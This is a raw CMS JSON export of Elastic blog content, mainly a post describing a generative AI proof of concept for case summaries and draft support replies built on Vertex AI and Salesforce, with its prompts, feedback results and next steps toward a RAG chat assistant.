2024\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs82a3c290a844431d"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3daa4f9981cbcd4e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2ee0b2a5531ff0d8"}}}],"publish_date":"2024-09-26","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Understanding AI for customer support guide | Elastic","seo_description_l10n":"Explore the role of AI in customer support, from chatbots to virtual assistants, enhancing user experiences and increasing satisfaction without replacing human agents.","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt3184f3496194138e","ACL":{},"created_at":"2023-11-06T20:36:32.173Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-support","label_l10n":"Customer support","tags":[],"title":"Customer support","updated_at":"2023-11-06T20:36:32.173Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.257Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltfb1e89b001674db9","ACL":{},"created_at":"2023-11-06T21:30:17.252Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"relevance","label_l10n":"Relevance","tags":[],"title":"Relevance","updated_at":"2023-11-06T21:30:17.252Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.339Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltf04b065d79bd1a12","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-09-25T17:21:40.204Z","created_by":"bltb6c155cd84fc0c1a","file_size":"193635","filename":"elastic-de-142343-blogheader.V2_V1.jpg","parent_uid":null,"tags":[],"title":"elastic-de-142343-blogheader.V2_V1.jpg","updated_at":"2024-09-25T17:21:40.204Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-09-26T14:00:00.249Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf04b065d79bd1a12/66f446a4f9cb26549f43e479/elastic-de-142343-blogheader.V2_V1.jpg"},"title":"Understanding AI for customer support: How AI is transforming customer service","title_l10n":"Understanding AI for customer support: How AI is transforming customer service","updated_at":"2025-01-17T19:18:53.958Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/understanding-ai-customer-support","publish_details":{"time":"2025-01-17T19:18:58.121Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt62a26b9c217a3102","_version":14,"locale":"en-us","ACL":{},"abstract_l10n":"This series gives you an inside look at how we're using generative AI in Elastic customer support. Join us as we share our journey in real time!","author":["blt57f0334083eb9790"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-06-27T18:49:32.722Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb3ef354065f10f37"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWelcome to the Inside Elastic blog series, where we showcase Elastic's internal operations solving real-world business challenges. This specific series will shed light on our journey to integrate generative AI into our customer success and support operations, providing you with a behind-the-scenes look at our process. We’re blogging about this capability as we’re building it, and we’re excited for you to join the ride!\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Generative AI: The Next Frontier","_metadata":{"uid":"cs84b3616f4eb2629d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe launch of OpenAI's generative AI tools in late 2022 opened a world of possibilities for AI-generated content. Business leaders quickly sought ways to harness this technology for their unique challenges. This is especially true of our Customer Success and Support teams’ operations, after hearing questions from our leaders at Elastic like:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI improve customer support efficiency and effectiveness?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI enhance the customer experience and satisfaction?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI be integrated with existing customer support systems and processes?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI assist in automating repetitive tasks and free up support agents' time for more complex and strategic activities?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Field Engineering team, responsible for custom internal tooling, started to investigate generative AI and met at an offsite to brainstorm potential applications. Given we are Elastic, we were aware of our product’s search capabilities and how we integrate into the larger AI technology stack. However, technology alone doesn’t answer any of the questions above.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhile discussing the possibilities of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/generative-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003egenerative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we landed on two support workflows that we thought could benefit our internal teams and, as a result, our customers:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAutomated case summaries:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Our support engineers spend a significant amount of time providing case summaries for escalation or transitioning a case from one engineer to another. Our hypothesis was that we could use generative AI to automate this process and increase our support team’s efficiency and effectiveness, improve issue resolution, and boost customer satisfaction overall.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDrafting an initial reply:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Service level agreements are a key benefit of our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/support\"\u003e\u003cspan style='font-size: 12pt;'\u003esupport offering\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and ensuring timely response is paramount. We were unsure if the large language model (LLM) was smart enough to offer an accurate, relevant response, but we were convinced that our learnings from this process would be critical in deciding the next use case.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eArmed with this decision, we decided to build a scalable proof of concept that would allow us to operationalize these workflows for a subset of our users while including a feedback mechanism to rate and improve quality.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Building a proof of concept for feedback","_metadata":{"uid":"cs2ce87d0283eadfbf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor context, our Field Engineering team has built our system’s infrastructure on top of \u003c/span\u003e\u003ca href=\"https://cloud.google.com/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGoogle Cloud Platform\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, with Salesforce \u003c/span\u003e\u003ca href=\"https://www.salesforce.com/service/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eService Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e powering our case management. This existing setup made it straightforward to integrate our initial proof of concept with \u003c/span\u003e\u003ca href=\"https://cloud.google.com/vertex-ai?\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eVertex AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which was already enabled internally and compliant with our security and privacy policies.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOf course, we knew Elastic would play a role in our design (and subsequent blogs will speak to that), but at this initial stage we were focused on the LLM itself and applying generative text to the outlined workflow. The very first architecture looked like this:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csac2f8393231913a7"}}},{"image":{"image":{"uid":"bltcb97c512e241c08d","_version":1,"title":"1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-06-27T18:50:02.732Z","updated_at":"2024-06-27T18:50:02.732Z","content_type":"image/png","file_size":"245511","filename":"1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-27T19:01:39.844Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcb97c512e241c08d/667db45ab113249b1a3a2706/1.png"},"_metadata":{"uid":"cs0fb120c63b220710"},"caption_l10n":"","alt_text_l10n":"architecture","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Creating a case summary","_metadata":{"uid":"csc9a4c1bf96adc650"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAt a high level, we wanted to keep the automation simple. We asked our CRM team to add a custom button on all cases that would call an external endpoint. That external endpoint was a Google \u003c/span\u003e\u003ca href=\"https://cloud.google.com/functions?\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCloud Function\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e that did the following:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1.\u0026nbsp; The function accepted the Salesforce unique case ID as input and retrieved the case details as text.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e2. The retrieved text would then be automatically sent to Vertex AI combined with the following \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/prompt-engineering\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eengineered prompt\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003eWrite the summary of the following customer agent conversation in a paragraph? \\\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan\u003e\u003c/span\u003e\u003cspan\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003eConsidering the conversation below, what are the pending actions by the Agent? Keep the response short.\\\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003eUse only the information from the conversation below:\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003e\"\"\"\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003e${text}\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003e\"\"\"\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003eProvide the answers in the dictionary format : {Summary:[], Pending Actions:[]}`;\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e3. The AI-generated response was posted to the case via a Salesforce \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eChatter Post\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThat was basically it! The lone exception was for long-running cases, where we had to break down the text into summaries of summaries. Once we landed on a design, we had this up and running in a week.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Automating a draft initial reply","_metadata":{"uid":"csab444269458cbe13"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhile a little more complex than case summaries, automating a reply for our support engineers to review was relatively straightforward. We leveraged an existing automation for all newly created cases and called a new Google \u003c/span\u003e\u003ca href=\"https://cloud.google.com/pubsub?\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePub/Sub\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e queue to handle all the incoming requests separately. The Pub/Sub performed the following tasks:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1. It stored the Case ID in the queue for when resources were available.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e2. On execution, it passed the Case ID to a different Google Cloud Function that would extract only the customer’s initial request as text.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e3. The retrieved text would then be automatically sent to Vertex AI combined with the following engineered prompt:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003eYou are an expert Elastic Support Engineer, using only Elastic products, provide a \\\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003eresponse with resolution to this email by a customer:\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003e\"\"\"\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003e${text}\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cspan data-type='inlineCode'\u003e\"\"\"`;\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e4. The AI-generated response was posted to the case via a Salesforce Chatter Post.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAgain, a simple approach to capturing an initial draft reply that was scalable for the subset of cases we were looking at. This took us a few extra days to modify our existing code and the additional Pub/Sub functionality and took us roughly two weeks to complete.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUsing Vertex AI as our LLM for this proof of concept was an easy decision. We knew we would have plenty to think about related to LLM accuracy (see below), but the ease of connecting it with our existing infrastructure made this process much quicker. Much like search, the relevance of an AI-generated response is a deeper conversation and something we knew we would tackle next.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Capturing user feedback","_metadata":{"uid":"cscd558c80799bdfa3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAn example of the previously mentioned Salesforce Chatter post:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb1ce0dcec516afd5"}}},{"image":{"image":{"uid":"blte1ccb7e67d424fc8","_version":1,"title":"2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-06-27T18:50:08.632Z","updated_at":"2024-06-27T18:50:08.632Z","content_type":"image/png","file_size":"115487","filename":"2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-27T19:01:39.834Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte1ccb7e67d424fc8/667db460abc513cfa45d0981/2.png"},"_metadata":{"uid":"cs7b18f3d25417227f"},"caption_l10n":"","alt_text_l10n":"support automation","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbaeb9ba00c954eca"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn both use cases, draft reply and case summary, the decision to use Salesforce Chatter to deliver the AI-generated text was based on the idea that we could use standard Chatter features for \u003c/span\u003e\u003ca href=\"https://help.salesforce.com/s/articleView?id=sf.collab_feed_like.htm\u0026type=5\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e\"likes\"\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to identify positive sentiment and threaded responses to capture subjective feedback. This was a critical step in the process and reduced friction in the feedback loop as users could work cases and provide their feedback in the same operational system.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are much more sophisticated techniques for evaluating LLM accuracy, especially when Elasticsearch provides context. Still, we intentionally avoided that for the proof of concept as our data population was manageable, and we wanted to review every comment.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Objectively evaluating results and making decisions","_metadata":{"uid":"cs1eb5eb9f37612fe3"},"header_style":"H2","paragraph_l10n":"\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDays Open\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e44\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenerated Content\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e940\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFeedback\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e217\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePositive Sentiment\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e15.67%\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eThe initial user feedback yielded a ~16% positive response rate, which was lower than expected. Reviewing subjective feedback revealed that the LLM lacked in-depth knowledge of our products, which hindered its ability to address technical support queries. The model performed much better with generic summaries and responses that didn't require specific product knowledge. This highlighted a content gap, as the LLM was trained on public data and lacked access to key data sources like our product documentation and internal knowledge base articles.\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBased on this data, we decided to add two new design principles:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eRefine the input data: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe recognized the need for a more explicit input experience to provide clearer, more direct questions to the LLM for improved responses. This is equivalent to the “garbage in, garbage out” statement in data engineering.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSet a higher accuracy/sentiment threshold:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Technical support requires high accuracy, so we aimed for a \u0026gt;80% benchmark and developed systems to measure and enhance accuracy at various stages.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGuided by these principles, we decided that the optimal experience would be to consolidate these and all other potential functions into a unified chat interface. That should help curate the inputs in a consistent way for better workflow and responses. Furthermore, we knew the next evolution would need to include Elasticsearch for improved response accuracy via a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eretrieval augmented generation\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e architecture.\u0026nbsp; This should allow us to evaluate accuracy at scale and significantly improve the precision of our responses.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Solving business problems","_metadata":{"uid":"cs40950c394c9b4dce"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eArmed with this data-backed understanding of how a large language model responds to our specific workflows and our decision to integrate the solution into a chatbot, we revisited the questions from our business leaders:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI improve customer support efficiency and effectiveness?\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe believe we can build a self-service chatbot experience that will answer support related product questions. Support agents’ use of the chatbot will speed up their analysis and investigation, reducing mean time to resolution. In addition, new joiners can learn from the chatbot rather than other members of the team. This can reduce onboarding time and create capacity in existing team members who are fielding these questions today.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI enhance the customer experience and satisfaction?\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Technology Services Industry Association (\u003c/span\u003e\u003ca href=\"https://www.tsia.com/who-we-are\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eTSIA\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e), which works with thousands of support organizations, has years of research supporting the fact that customers \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eprefer\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e self-service over assisted support. Exposing a similar self-service chatbot can increase both user experience and customer satisfaction as real-time, relevant responses can reduce customer response times to milliseconds and don’t require reading through vast pages of documentation.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI be integrated with existing customer support systems and processes?\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur talented team of developers can easily integrate a chat experience into our custom Support Portal at the point where customers are asking these questions and leverage Elasticsearch for knowledge content search.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow can generative AI assist in automating repetitive tasks and free up support agents' time for more complex and strategic activities?\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSupport agents consistently search for product documentation, internal enablement content, and knowledge articles for an answer. Natural language chat is an evolution of these search activities that deliver contextual, relevant responses rather than recommending information to read. The efficiencies gained in search time alone will free up support agent time for other value-add, strategic activities.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter a few months of gathering data, we presented our findings, designs, and plans for a chat-based Support AI Assistant to our stakeholders, aligned on the above outcomes, and moved from proof of concept to an approved project.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur customers and our community are at the heart of everything we do. When building any internal or external experience, we keep our Customers, 1st. Investing in this process allowed us to build an informed plan to execute against, keeping our customers front of mind.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What's next?","_metadata":{"uid":"cs8633d8f7e155ba19"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur Field Engineering team is now focused on developing a scalable, secure, and accurate Support AI Chat Assistant. This blog series will continue with regular updates, each installment highlighting a different aspect of our build process. Stay tuned for more insights and inspiration for your own generative AI projects.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 